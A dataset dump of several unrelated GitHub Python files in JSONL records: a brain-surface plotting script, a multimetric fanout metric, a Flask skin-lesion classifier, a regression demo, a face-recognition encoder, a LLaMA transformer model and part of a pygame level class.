\"S_collat_transv_post\"]\nlabels = get_labels(label_names, annot_name=\"aparc.a2009s\", hemi=\"lh\")\ncoefs = build_coefs(n_tasks=n_subjects, overlap=overlap,\n n_sources=n_sources, seed=seed,\n positive=True, labels_type=\"any\",\n dataset=dataset)\ncoefs += np.random.randn(*coefs.shape) * 10\n\nviews = [dict(azimuth=-135.40236255883042,\n elevation=78.58822778745676,\n distance=437.24652099609347,\n focalpoint=np.array([0., 1.28382111, 0.]),\n roll=77.61442413729858), \"lateral\"]\n\nfor i, view in enumerate(views):\n fname = \"real_data/fig/coefs_-v%i.png\" % i\n plot_blobs(np.concatenate((coefs, coefs)), subject='fsaverage',\n save_fname=fname,\n title=None, surface=\"inflated\", text=\"\", hemi=\"lh\",\n background=\"white\", views=view, top_vertices=2500,\n dataset=dataset, labels=labels,\n figsize=(800, 800))\n","repo_name":"hichamjanati/neuroimage-multi-subject-2020","sub_path":"plot_fig2.py","file_name":"plot_fig2.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36681272212","text":"from multimetric.cls.base import MetricBase\nfrom multimetric.cls.tokentree import TokenTree\nfrom multimetric.cls.tokentree import TokenTreeConfig\n\n\nclass MetricBaseFanout(MetricBase):\n _config = {\n 'Go': TokenTreeConfig(\n start=[('Token.Keyword.Namespace', 'import')],\n end=[('Token.Punctuation', r'\\)')],\n needle=['Token.Literal.String'],\n trim=['\"', \"'\"]),\n 'PHP': TokenTreeConfig(\n start=[('Token.Keyword', 'include'), ('Token.Keyword', 'require'),\n ('Token.Keyword', 'include_once'), ('Token.Keyword', 'require_once')],\n end=[('Token.Punctuation', ';'), ('Token.Text', '\\n')],\n needle=['Token.Literal.String'],\n trim=['\"', \"'\"]),\n 'Ruby': TokenTreeConfig(\n start=[('Token.Name.Builtin', 'require')],\n end=[('Token.Text.Whitespace', r'\\)')],\n needle=['Token.Literal', 'Token.Literal.String.Double'],\n trim=['\"', \"'\"]),\n 'Python': TokenTreeConfig(\n start=[('Token.Keyword.Namespace', 'import'), ('Token.Keyword.Namespace', 'from')],\n end=[('Token.Text', '\\n')],\n needle=['Token.Name.Namespace', 'Token.Keyword.Namespace', 'Token.Name'],\n trim=[]),\n 'Bash': TokenTreeConfig(\n start=[('Token.Name.Builtin', 'source'), ('Token.Text', r'\\.')],\n end=[('Token.Text', '\\n'), ('Token.Text', '\\n\\n')],\n needle=['Token.Text'],\n trim=[' ', '\\n']),\n 'CoffeeScript': TokenTreeConfig(\n start=[('Token.Name.Other', 'require'), ('Token.Name.Other', 'import')],\n end=[('Token.Text', '\\n'), ('Token.Text', '\\n\\n')],\n needle=['Token.Literal.String'],\n trim=['\"', \"'\", ' ']),\n 'C#': TokenTreeConfig(\n start=[('Token.Keyword', 'using')],\n end=[('Token.Punctuation', ';')],\n needle=['Token.Name.Namespace'],\n trim=['\"', \"'\", ' ']),\n 'Dart': TokenTreeConfig(\n start=[('Token.Keyword', 'import')],\n end=[('Token.Punctuation', ';')],\n needle=['Token.Literal.String'],\n trim=['\"', \"'\", ' ']),\n 'Groovy': TokenTreeConfig(\n start=[('Token.Keyword.Namespace', 'import')],\n end=[('Token.Operator', ';'), ('Token.Text', '\\n')],\n needle=['Token.Name.Namespace'],\n trim=[' ']),\n 'Haskell': TokenTreeConfig(\n start=[('Token.Keyword.Reserved', 'import')],\n end=[('Token.Text', '\\n')],\n needle=['Token.Name.Namespace'],\n trim=[' ']),\n 'Julia': TokenTreeConfig(\n start=[('Token.Keyword', 'import'), ('Token.Keyword', 'using')],\n end=[('Token.Text', '\\n'), ('Token.Operator', ':')],\n needle=['Token.Name', 'Token.Operator'],\n trim=[' ', ':']),\n 'Java': TokenTreeConfig(\n start=[('Token.Keyword.Namespace', 'import')],\n end=[('Token.Text', '\\n'), ('Token.Punctuation', ';')],\n needle=['Token.Name.Namespace'],\n trim=[' ']),\n 'JavaScript': TokenTreeConfig(\n start=[('Token.Keyword', 'import'), ('Token.Keyword.Reserved', 'from')],\n end=[('Token.Text', '\\n'), ('Token.Punctuation', ';'), ('Token.Punctuation', '{')],\n needle=['Token.Literal.String'],\n trim=[' ', '\"', \"'\"]),\n 'Kotlin': TokenTreeConfig(\n start=[('Token.Keyword', 'import')],\n end=[('Token.Text', '\\n')],\n needle=['Token.Name.Namespace'],\n trim=[' ']),\n 'Lua': TokenTreeConfig(\n start=[('Token.Name.Builtin', 'require')],\n end=[('Token.Text', '\\n'), ('Token.Text', '\\n\\n')],\n needle=['Token.Literal.String'],\n trim=[' ', '\"', \"'\"]),\n 'Objective-C': TokenTreeConfig(\n start=[('Token.Comment.Preproc', 'import .*')],\n end=[('Token.Comment.Preproc', '\\n'), ('Token.Text', '\\n'), ('Token.Text', '\\n\\n')],\n needle=['Token.Comment.Preproc'],\n trim=[' ', '\"', \"'\", '\\n', 'import '],\n include_start=True),\n 'Prolog': TokenTreeConfig(\n start=[('Token.Literal.String', 'use')],\n end=[('Token.Punctuation', ';'), ('Token.Text', '\\n')],\n needle=['Token.Literal'],\n trim=[' ']),\n 'Rust': TokenTreeConfig(\n start=[('Token.Keyword', 'use')],\n end=[('Token.Punctuation', ';'), ('Token.Text', '\\n')],\n needle=['Token.Name', 'Token.Keyword', 'Token.Literal', 'Token.Text'],\n trim=[' ']),\n 'Tcl': TokenTreeConfig(\n start=[('Token.Text', 'import')],\n end=[('Token.Text', 'forget'), ('Token.Text', '\\n'), ('Token.Text', '\\n\\n')],\n needle=['Token.Text'],\n trim=[' ', '-', 'force', 'import', '\\n'],\n split_by=' '),\n 'TypeScript': TokenTreeConfig(\n start=[('Token.Keyword', 'import'), ('Token.Keyword.Reserved', 'from')],\n end=[('Token.Text', '\\n'), ('Token.Punctuation', ';'), ('Token.Punctuation', '{')],\n needle=['Token.Literal.String'],\n trim=[' ', '\"', \"'\"]),\n 'Zig': TokenTreeConfig(\n start=[('Token.Name.Builtin', '@import')],\n end=[('Token.Text', '\\n'), ('Token.Punctuation', ';')],\n needle=['Token.Literal'],\n trim=[' ', '\"', \"'\"]),\n 'default': TokenTreeConfig(\n start=[('Token.Comment.Preproc', 'include'), ('Token.Comment.Namespace', '')],\n end=[('Token.Text.Whitespace', '\\n'), ('Token.Comment.Preproc', '\\n')],\n needle=['Token.Comment.PreprocFile'],\n trim=[]),\n }\n\n _internal = {\n \"Python\": {\"start\": '.', \"end\": ''},\n \"C\": {\"start\": '\"', \"end\": '\"'},\n \"C++\": {\"start\": '\"', \"end\": '\"'},\n \"CoffeeScript\": {\"start\": './', \"end\": ''},\n \"Julia\": {\"start\": '.', \"end\": ''},\n \"TypeScript\": {\"start\": './', \"end\": ''},\n }\n\n METRIC_FANOUT_INTERNAL = \"fanout_internal\"\n METRIC_FANOUT_EXTERNAL = \"fanout_external\"\n\n def __init__(self, args, **kwargs):\n super().__init__(args, **kwargs)\n self._int = set()\n self._ext = set()\n\n def __isInternal(self, value, internal_mapping):\n if not internal_mapping:\n return False\n return all([value.startswith(internal_mapping[\"start\"]), # pragma: no cover - bug in pytest-cov\n value.endswith(internal_mapping[\"end\"])])\n\n def parse_tokens(self, language, tokens):\n super().parse_tokens(language, [])\n\n config = MetricBaseFanout._config.get(language, MetricBaseFanout._config['default'])\n _imports = TokenTree.get_from_token_tree(enumerate(tokens), config)\n\n for x in _imports:\n if self.__isInternal(x, MetricBaseFanout._internal.get(language, {})):\n self._int.add(str(x)) # pragma: no cover - bug in pytest-cov\n else:\n self._ext.add(str(x))\n self._metrics.update({MetricBaseFanout.METRIC_FANOUT_INTERNAL: len(list(self._int)),\n MetricBaseFanout.METRIC_FANOUT_EXTERNAL: len(list(self._ext))})\n self._internalstore[\"int\"] = list(self._int)\n self._internalstore[\"ext\"] = list(self._ext)\n\n def get_results_global(self, value_stores):\n _int = []\n _ext = []\n for x in self._get_all_matching_store_objects(value_stores):\n _int += x[\"int\"]\n _ext += x[\"ext\"]\n return {\n MetricBaseFanout.METRIC_FANOUT_INTERNAL: len(_int),\n MetricBaseFanout.METRIC_FANOUT_EXTERNAL: len(_ext),\n }\n","repo_name":"priv-kweihmann/multimetric","sub_path":"multimetric/cls/metric/fanout.py","file_name":"fanout.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"} +{"seq_id":"25497258458","text":"from __future__ import division, print_function\nimport sys\nimport os\nimport glob\nimport re\nimport numpy as np\n\nimport torch\nfrom PIL import Image\nimport albumentations as aug\n#from efficientnet_pytorch import EfficientNet\nfrom flask import Flask, redirect, url_for, request, render_template,jsonify\nfrom werkzeug.utils import secure_filename\nfrom gevent.pywsgi import WSGIServer\n\napp = Flask(__name__)\n\nmodel = torch.load('canc.pth')\nmodel.eval()\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\ndef model_predict(file, model):\n image = Image.open(file)\n image = np.array(image)\n transforms = aug.Compose([\n aug.Resize(224,224),\n aug.Normalize((0.485, 0.456, 0.406),(0.229, 0.224, 0.225),max_pixel_value=255.0,always_apply=True),\n ])\n image = transforms(image=image)[\"image\"]\n image = np.transpose(image, (2, 0, 1)).astype(np.float32)\n image = torch.tensor([image], dtype=torch.float)\n preds = model(image)\n preds = np.argmax(preds.detach())\n return preds\n\ndef save_image(url):\n response =request.get(url)\n if response.status_code == 200:\n with open(\"img.png\",'wb') as f:\n f.write(response.content)\n\n\n@app.route('/predict', methods=['POST'])\ndef upload():\n skin_lesion=request.get_json()\n image_url=skin_lesion['url']\n print(image_url)\n save_image(image_url)\n labs= ['MELANOMA', 'MELANOCYTIC NEVUS', 'BASAL CELL CARCINOMA', 'ACTINIC KERATOSIS', 'BENIGN KERATOSIS', 'DERMATOFIBROMA', 'VASCULAR LESION', 'SQUAMOUS CELL CARCINOMA']\n preds = model_predict(image_url, model)\n result = labs[preds]\n return jsonify({'result':result})\n\nif __name__ == '__main__':\n\tapp.run(host=\"127.0.0.1\",port=8080,debug=True)\n\n","repo_name":"random-dark/fallfest","sub_path":"HeartRateClassification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42781925993","text":"#learning to us regression modell\n#first thing i realized is i dont know shit about regression, time for youtube\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn import datasets, linear_model\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom cycler import cycler\n\ndiabetes = datasets.load_diabetes()\ndiabetes_X = diabetes.data[:, np.newaxis, 2]\n\n#this is a retarded way to split the sample into test and train, so i made it with a function i learned form knn.\n'''\ndiabetes_X_train = diabetes_X[:-20]\ndiabetes_X_test = diabetes_X[-20:]\n\ndiabetes_y_train = diabetes.target[:-20]\ndiabetes_y_test = diabetes.target[-20:]\n'''\n\n\n\nfor i in range(0,10):\n diabetes_X_train, diabetes_X_test, diabetes_y_train, diabetes_y_test = train_test_split(diabetes_X, diabetes.target, test_size=0.3)\n\n regr = linear_model.LinearRegression()\n\n regr.fit(diabetes_X_train, diabetes_y_train)\n\n print(\"Coefficient: \\n\", regr.coef_)\n print(\"Mean squared error: %.2f\"\n % np.mean((regr.predict(diabetes_X_test) - diabetes_y_test) ** 2))\n\n print('Variance score: %.2f' % regr.score(diabetes_X_test, diabetes_y_test))\n\n plt.scatter(diabetes_X_test, diabetes_y_test)\n plt.plot(diabetes_X_test, regr.predict(diabetes_X_test))\n\nplt.rc('lines', linewidth=1)\nplt.rc('axes', prop_cycle=(cycler('color', ['r', 'g', 'b', 'y'])))\nplt.xticks(())\nplt.yticks(())\nplt.show()\n\nplt.savefig('display.png')\n\n","repo_name":"naosz/machinelearning_beginning","sub_path":"regressiondemo.py","file_name":"regressiondemo.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22989417002","text":"import pprint\nimport sqlite3\n\nfrom imutils import paths\nimport face_recognition\nimport pickle\nimport cv2\nimport os\n\ncon = sqlite3.Connection('face_enc.sqlite')\ncur = con.cursor()\nnames = cur.execute('SELECT info FROM Users').fetchall()\nimagePaths = []\nfor i in names:\n imagePaths.append((os.listdir(os.getcwd() + '\\\\Images\\\\' + i[0]), i[0]))\n# в директории Images хранятся папки со всеми изображениями\n# imagePaths = list(paths.list_images('Images'))\nknownEncodings = []\nknownNames = []\n# # перебираем все папки с изображениями\nfor (i, imagePath) in enumerate(imagePaths):\n for j in imagePath[0]:\n # извлекаем имя человека из названия папки\n # name = imagePath.split(os.path.sep)[-1]\n name = imagePath[-1]\n # загружаем изображение и конвертируем его из BGR (OpenCV ordering)\n # в dlib ordering (RGB)\n print(j, name)\n image = cv2.imread(f'Images\\\\{name}\\\\' + j)\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # используем библиотеку Face_recognition для обнаружения лиц\n boxes = face_recognition.face_locations(rgb, model='hog')\n # вычисляем эмбеддинги для каждого лица\n encodings = face_recognition.face_encodings(rgb, boxes)\n # цикл по кодировкам\n for encoding in encodings:\n knownEncodings.append(encoding)\n knownNames.append(name)\n# сохраним эмбеддинги вместе с их именами в формате словаря\ndata = {\"encodings\": knownEncodings, \"names\": knownNames}\n# для сохранения данных в файл используем метод pickle\nf = open(\"face_enc\", \"wb\")\nf.write(pickle.dumps(data))\nf.close()\ncon.close()\n","repo_name":"RaZe31-cs/Face_recognition","sub_path":"load_face.py","file_name":"load_face.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17792388211","text":"import math\nfrom dataclasses import dataclass\nfrom typing import Optional, Tuple\n\nimport fairscale.nn.model_parallel.initialize as fs_init\nimport torch\nimport torch.nn.functional as F\nfrom fairscale.nn.model_parallel.layers import (\n ColumnParallelLinear,\n ParallelEmbedding,\n RowParallelLinear,\n)\nfrom torch import nn\n\n\n@dataclass\nclass ModelArgs:\n dim: int = 4096\n n_layers: int = 32\n n_heads: int = 32\n n_kv_heads: Optional[int] = None\n vocab_size: int = -1 # defined later by tokenizer\n multiple_of: int = 256 # make SwiGLU hidden layer size multiple of large power of 2\n ffn_dim_multiplier: Optional[float] = None\n norm_eps: float = 1e-5\n\n max_batch_size: int = 32\n max_seq_len: int = 2048\n\n\nclass RMSNorm(torch.nn.Module):\n def __init__(self, dim: int, eps: float = 1e-6):\n \"\"\"\n Initialize the RMSNorm normalization layer.\n\n Args:\n dim (int): The dimension of the input tensor.\n eps (float, optional): A small value added to the denominator for numerical stability. Default is 1e-6.\n\n Attributes:\n eps (float): A small value added to the denominator for numerical stability.\n weight (nn.Parameter): Learnable scaling parameter.\n\n \"\"\"\n super().__init__()\n self.eps = eps\n self.weight = nn.Parameter(torch.ones(dim))\n\n def _norm(self, x):\n \"\"\"\n Apply the RMSNorm normalization to the input tensor.\n\n Args:\n x (torch.Tensor): The input tensor.\n\n Returns:\n torch.Tensor: The normalized tensor.\n\n \"\"\"\n return x * torch.rsqrt(x.pow(2).mean(-1, keepdim=True) + self.eps)\n\n def forward(self, x):\n \"\"\"\n Forward pass through the RMSNorm layer.\n\n Args:\n x (torch.Tensor): The input tensor.\n\n Returns:\n torch.Tensor: The output tensor after applying RMSNorm.\n\n \"\"\"\n output = self._norm(x.float()).type_as(x)\n return output * self.weight\n\n\ndef precompute_freqs_cis(dim: int, end: int, theta: float = 10000.0):\n \"\"\"\n Precompute the frequency tensor for complex exponentials (cis) with given dimensions.\n\n This function calculates a frequency tensor with complex exponentials using the given dimension 'dim'\n and the end index 'end'. The 'theta' parameter scales the frequencies.\n The returned tensor contains complex values in complex64 data type.\n\n Args:\n dim (int): Dimension of the frequency tensor.\n end (int): End index for precomputing frequencies.\n theta (float, optional): Scaling factor for frequency computation. Defaults to 10000.0.\n\n Returns:\n torch.Tensor: Precomputed frequency tensor with complex exponentials.\n\n \n \n\n \"\"\"\n freqs = 1.0 / (theta ** (torch.arange(0, dim, 2)[: (dim // 2)].float() / dim))\n t = torch.arange(end, device=freqs.device) # type: ignore\n freqs = torch.outer(t, freqs).float() # type: ignore\n freqs_cis = torch.polar(torch.ones_like(freqs), freqs) # complex64\n return freqs_cis\n\n\ndef reshape_for_broadcast(freqs_cis: torch.Tensor, x: torch.Tensor):\n \"\"\"\n Reshape frequency tensor for broadcasting it with another tensor.\n\n This function reshapes the frequency tensor to have the same shape as the target tensor 'x'\n for the purpose of broadcasting the frequency tensor during element-wise operations.\n\n Args:\n freqs_cis (torch.Tensor): Frequency tensor to be reshaped.\n x (torch.Tensor): Target tensor for broadcasting compatibility.\n\n Returns:\n torch.Tensor: Reshaped frequency tensor.\n\n Raises:\n AssertionError: If the frequency tensor doesn't match the expected shape.\n AssertionError: If the target tensor 'x' doesn't have the expected number of dimensions.\n \"\"\"\n ndim = x.ndim\n assert 0 <= 1 < ndim\n assert freqs_cis.shape == (x.shape[1], x.shape[-1])\n shape = [d if i == 1 or i == ndim - 1 else 1 for i, d in enumerate(x.shape)]\n return freqs_cis.view(*shape)\n\n\ndef apply_rotary_emb(\n xq: torch.Tensor,\n xk: torch.Tensor,\n freqs_cis: torch.Tensor,\n) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Apply rotary embeddings to input tensors using the given frequency tensor.\n\n This function applies rotary embeddings to the given query 'xq' and key 'xk' tensors using the provided\n frequency tensor 'freqs_cis'. The input tensors are reshaped as complex numbers, and the frequency tensor\n is reshaped for broadcasting compatibility. The resulting tensors contain rotary embeddings and are\n returned as real tensors.\n\n Args:\n xq (torch.Tensor): Query tensor to apply rotary embeddings.\n xk (torch.Tensor): Key tensor to apply rotary embeddings.\n freqs_cis (torch.Tensor): Precomputed frequency tensor for complex exponentials.\n\n Returns:\n Tuple[torch.Tensor, torch.Tensor]: Tuple of modified query tensor and key tensor with rotary embeddings.\n\n \n\n \"\"\"\n xq_ = torch.view_as_complex(xq.float().reshape(*xq.shape[:-1], -1, 2))\n xk_ = torch.view_as_complex(xk.float().reshape(*xk.shape[:-1], -1, 2))\n freqs_cis = reshape_for_broadcast(freqs_cis, xq_)\n xq_out = torch.view_as_real(xq_ * freqs_cis).flatten(3)\n xk_out = torch.view_as_real(xk_ * freqs_cis).flatten(3)\n return xq_out.type_as(xq), xk_out.type_as(xk)\n\n\ndef repeat_kv(x: torch.Tensor, n_rep: int) -> torch.Tensor:\n \"\"\"torch.repeat_interleave(x, dim=2, repeats=n_rep)\"\"\"\n bs, slen, n_kv_heads, head_dim = x.shape\n if n_rep == 1:\n return x\n return (\n x[:, :, :, None, :]\n .expand(bs, slen, n_kv_heads, n_rep, head_dim)\n .reshape(bs, slen, n_kv_heads * n_rep, head_dim)\n )\n\n\nclass Attention(nn.Module):\n \"\"\"Multi-head attention module.\"\"\"\n def __init__(self, args: ModelArgs):\n \"\"\"\n Initialize the Attention module.\n\n Args:\n args (ModelArgs): Model configuration parameters.\n\n Attributes:\n n_kv_heads (int): Number of key and value heads.\n n_local_heads (int): Number of local query heads.\n n_local_kv_heads (int): Number of local key and value heads.\n n_rep (int): Number of repetitions for local heads.\n head_dim (int): Dimension size of each attention head.\n wq (ColumnParallelLinear): Linear transformation for queries.\n wk (ColumnParallelLinear): Linear transformation for keys.\n wv (ColumnParallelLinear): Linear transformation for values.\n wo (RowParallelLinear): Linear transformation for output.\n cache_k (torch.Tensor): Cached keys for attention.\n cache_v (torch.Tensor): Cached values for attention.\n\n \"\"\"\n super().__init__()\n self.n_kv_heads = args.n_heads if args.n_kv_heads is None else args.n_kv_heads\n model_parallel_size = fs_init.get_model_parallel_world_size()\n self.n_local_heads = args.n_heads // model_parallel_size\n self.n_local_kv_heads = self.n_kv_heads // model_parallel_size\n self.n_rep = self.n_local_heads // self.n_local_kv_heads\n self.head_dim = args.dim // args.n_heads\n\n self.wq = ColumnParallelLinear(\n args.dim,\n args.n_heads * self.head_dim,\n bias=False,\n gather_output=False,\n init_method=lambda x: x,\n )\n self.wk = ColumnParallelLinear(\n args.dim,\n self.n_kv_heads * self.head_dim,\n bias=False,\n gather_output=False,\n init_method=lambda x: x,\n )\n self.wv = ColumnParallelLinear(\n args.dim,\n self.n_kv_heads * self.head_dim,\n bias=False,\n gather_output=False,\n init_method=lambda x: x,\n )\n self.wo = RowParallelLinear(\n args.n_heads * self.head_dim,\n args.dim,\n bias=False,\n input_is_parallel=True,\n init_method=lambda x: x,\n )\n\n self.cache_k = torch.zeros(\n (\n args.max_batch_size,\n args.max_seq_len,\n self.n_local_kv_heads,\n self.head_dim,\n )\n ).cuda()\n self.cache_v = torch.zeros(\n (\n args.max_batch_size,\n args.max_seq_len,\n self.n_local_kv_heads,\n self.head_dim,\n )\n ).cuda()\n\n def forward(\n self,\n x: torch.Tensor,\n start_pos: int,\n freqs_cis: torch.Tensor,\n mask: Optional[torch.Tensor],\n ):\n \"\"\"\n Forward pass of the attention module.\n\n Args:\n x (torch.Tensor): Input tensor.\n start_pos (int): Starting position for caching.\n freqs_cis (torch.Tensor): Precomputed frequency tensor.\n mask (torch.Tensor, optional): Attention mask tensor.\n\n Returns:\n torch.Tensor: Output tensor after attention.\n\n \"\"\"\n bsz, seqlen, _ = x.shape\n xq, xk, xv = self.wq(x), self.wk(x), self.wv(x)\n\n xq = xq.view(bsz, seqlen, self.n_local_heads, self.head_dim)\n xk = xk.view(bsz, seqlen, self.n_local_kv_heads, self.head_dim)\n xv = xv.view(bsz, seqlen, self.n_local_kv_heads, self.head_dim)\n\n xq, xk = apply_rotary_emb(xq, xk, freqs_cis=freqs_cis)\n\n self.cache_k = self.cache_k.to(xq)\n self.cache_v = self.cache_v.to(xq)\n\n self.cache_k[:bsz, start_pos : start_pos + seqlen] = xk\n self.cache_v[:bsz, start_pos : start_pos + seqlen] = xv\n\n keys = self.cache_k[:bsz, : start_pos + seqlen]\n values = self.cache_v[:bsz, : start_pos + seqlen]\n\n # repeat k/v heads if n_kv_heads < n_heads\n keys = repeat_kv(keys, self.n_rep) # (bs, seqlen, n_local_heads, head_dim)\n values = repeat_kv(values, self.n_rep) # (bs, seqlen, n_local_heads, head_dim)\n\n xq = xq.transpose(1, 2) # (bs, n_local_heads, seqlen, head_dim)\n keys = keys.transpose(1, 2)\n values = values.transpose(1, 2)\n scores = torch.matmul(xq, keys.transpose(2, 3)) / math.sqrt(self.head_dim)\n if mask is not None:\n scores = scores + mask # (bs, n_local_heads, seqlen, cache_len + seqlen)\n scores = F.softmax(scores.float(), dim=-1).type_as(xq)\n output = torch.matmul(scores, values) # (bs, n_local_heads, seqlen, head_dim)\n output = output.transpose(1, 2).contiguous().view(bsz, seqlen, -1)\n return self.wo(output)\n\n\nclass FeedForward(nn.Module):\n def __init__(\n self,\n dim: int,\n hidden_dim: int,\n multiple_of: int,\n ffn_dim_multiplier: Optional[float],\n ):\n \"\"\"\n Initialize the FeedForward module.\n\n Args:\n dim (int): Input dimension.\n hidden_dim (int): Hidden dimension of the feedforward layer.\n multiple_of (int): Value to ensure hidden dimension is a multiple of this value.\n ffn_dim_multiplier (float, optional): Custom multiplier for hidden dimension. Defaults to None.\n\n Attributes:\n w1 (ColumnParallelLinear): Linear transformation for the first layer.\n w2 (RowParallelLinear): Linear transformation for the second layer.\n w3 (ColumnParallelLinear): Linear transformation for the third layer.\n\n \"\"\"\n super().__init__()\n hidden_dim = int(2 * hidden_dim / 3)\n # custom dim factor multiplier\n if ffn_dim_multiplier is not None:\n hidden_dim = int(ffn_dim_multiplier * hidden_dim)\n hidden_dim = multiple_of * ((hidden_dim + multiple_of - 1) // multiple_of)\n\n self.w1 = ColumnParallelLinear(\n dim, hidden_dim, bias=False, gather_output=False, init_method=lambda x: x\n )\n self.w2 = RowParallelLinear(\n hidden_dim, dim, bias=False, input_is_parallel=True, init_method=lambda x: x\n )\n self.w3 = ColumnParallelLinear(\n dim, hidden_dim, bias=False, gather_output=False, init_method=lambda x: x\n )\n\n def forward(self, x):\n return self.w2(F.silu(self.w1(x)) * self.w3(x))\n\n\nclass TransformerBlock(nn.Module):\n def __init__(self, layer_id: int, args: ModelArgs):\n \"\"\"\n Initialize a TransformerBlock.\n\n Args:\n layer_id (int): Identifier for the layer.\n args (ModelArgs): Model configuration parameters.\n\n Attributes:\n n_heads (int): Number of attention heads.\n dim (int): Dimension size of the model.\n head_dim (int): Dimension size of each attention head.\n attention (Attention): Attention module.\n feed_forward (FeedForward): FeedForward module.\n layer_id (int): Identifier for the layer.\n attention_norm (RMSNorm): Layer normalization for attention output.\n ffn_norm (RMSNorm): Layer normalization for feedforward output.\n\n \"\"\"\n super().__init__()\n self.n_heads = args.n_heads\n self.dim = args.dim\n self.head_dim = args.dim // args.n_heads\n self.attention = Attention(args)\n self.feed_forward = FeedForward(\n dim=args.dim,\n hidden_dim=4 * args.dim,\n multiple_of=args.multiple_of,\n ffn_dim_multiplier=args.ffn_dim_multiplier,\n )\n self.layer_id = layer_id\n self.attention_norm = RMSNorm(args.dim, eps=args.norm_eps)\n self.ffn_norm = RMSNorm(args.dim, eps=args.norm_eps)\n\n def forward(\n self,\n x: torch.Tensor,\n start_pos: int,\n freqs_cis: torch.Tensor,\n mask: Optional[torch.Tensor],\n ):\n \"\"\"\n Perform a forward pass through the TransformerBlock.\n\n Args:\n x (torch.Tensor): Input tensor.\n start_pos (int): Starting position for attention caching.\n freqs_cis (torch.Tensor): Precomputed cosine and sine frequencies.\n mask (torch.Tensor, optional): Masking tensor for attention. Defaults to None.\n\n Returns:\n torch.Tensor: Output tensor after applying attention and feedforward layers.\n\n \"\"\"\n h = x + self.attention.forward(\n self.attention_norm(x), start_pos, freqs_cis, mask\n )\n out = h + self.feed_forward.forward(self.ffn_norm(h))\n return out\n\n\nclass Transformer(nn.Module):\n def __init__(self, params: ModelArgs):\n \"\"\"\n Initialize a Transformer model.\n\n Args:\n params (ModelArgs): Model configuration parameters.\n\n Attributes:\n params (ModelArgs): Model configuration parameters.\n vocab_size (int): Vocabulary size.\n n_layers (int): Number of layers in the model.\n tok_embeddings (ParallelEmbedding): Token embeddings.\n layers (torch.nn.ModuleList): List of Transformer blocks.\n norm (RMSNorm): Layer normalization for the model output.\n output (ColumnParallelLinear): Linear layer for final output.\n freqs_cis (torch.Tensor): Precomputed cosine and sine frequencies.\n\n \"\"\"\n super().__init__()\n self.params = params\n self.vocab_size = params.vocab_size\n self.n_layers = params.n_layers\n\n self.tok_embeddings = ParallelEmbedding(\n params.vocab_size, params.dim, init_method=lambda x: x\n )\n\n self.layers = torch.nn.ModuleList()\n for layer_id in range(params.n_layers):\n self.layers.append(TransformerBlock(layer_id, params))\n\n self.norm = RMSNorm(params.dim, eps=params.norm_eps)\n self.output = ColumnParallelLinear(\n params.dim, params.vocab_size, bias=False, init_method=lambda x: x\n )\n\n self.freqs_cis = precompute_freqs_cis(\n # Note that self.params.max_seq_len is multiplied by 2 because the token limit for the Llama 2 generation of models is 4096. \n # Adding this multiplier instead of using 4096 directly allows for dynamism of token lengths while training or fine-tuning.\n self.params.dim // self.params.n_heads, self.params.max_seq_len * 2\n )\n\n @torch.inference_mode()\n def forward(self, tokens: torch.Tensor, start_pos: int):\n \"\"\"\n Perform a forward pass through the Transformer model.\n\n Args:\n tokens (torch.Tensor): Input token indices.\n start_pos (int): Starting position for attention caching.\n\n Returns:\n torch.Tensor: Output logits after applying the Transformer model.\n\n \"\"\"\n _bsz, seqlen = tokens.shape\n h = self.tok_embeddings(tokens)\n self.freqs_cis = self.freqs_cis.to(h.device)\n freqs_cis = self.freqs_cis[start_pos : start_pos + seqlen]\n\n mask = None\n if seqlen > 1:\n mask = torch.full(\n (1, 1, seqlen, seqlen), float(\"-inf\"), device=tokens.device\n )\n mask = torch.triu(mask, diagonal=start_pos + 1).type_as(h)\n\n for layer in self.layers:\n h = layer(h, start_pos, freqs_cis, mask)\n h = self.norm(h)\n output = self.output(h).float()\n return output\n","repo_name":"facebookresearch/llama","sub_path":"llama/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":17212,"program_lang":"python","lang":"en","doc_type":"code","stars":45685,"dataset":"github-code","pt":"72"} +{"seq_id":"26267324577","text":"import pygame\nfrom Tiles import Tile\nfrom Player import Player\nfrom Exit import Exit\nfrom Coins import Coin\n\n\ntile_size = 64\n\n\nclass Level:\n def __init__(self, level_data, surface):\n self.display_surface = surface\n self.setup_level(level_data)\n self.world_shift = 0\n\n self.score = 0\n\n self.money_collect_sound = pygame.mixer.Sound('moneycollect.ogg')\n\n def setup_level(self, layout):\n self.tiles = pygame.sprite.Group()\n self.coins = pygame.sprite.Group()\n\n self.player = pygame.sprite.GroupSingle()\n\n self.exit = pygame.sprite.GroupSingle()\n\n for row_index, row in enumerate(layout):\n for col_index, cell in enumerate(row):\n if cell == 'X':\n x = col_index * tile_size\n y = row_index * tile_size\n tile = Tile((x, y), tile_size)\n self.tiles.add(tile)\n if cell == 'P':\n x = col_index * tile_size\n y = row_index * tile_size\n player_sprite = Player((x, y))\n self.player.add(player_sprite)\n if cell == 'E':\n x = col_index * tile_size\n y = row_index * tile_size\n exit1 = Exit((x, y), tile_size)\n self.exit.add(exit1)\n if cell == 'C':\n x = col_index * tile_size\n y = row_index * tile_size\n coin = Coin((x, y), tile_size)\n self.coins.add(coin)\n\n def horizontal_movement_collision(self):\n player = self.player.sprite\n player.rect.x += player.direction.x * player.speed\n\n for sprite in self.tiles.sprites():\n if sprite.rect.colliderect(player.rect):\n if player.direction.x < 0:\n player.rect.left = sprite.rect.right\n elif player.direction.x > 0:\n player.rect.right = sprite.rect.left\n\n def 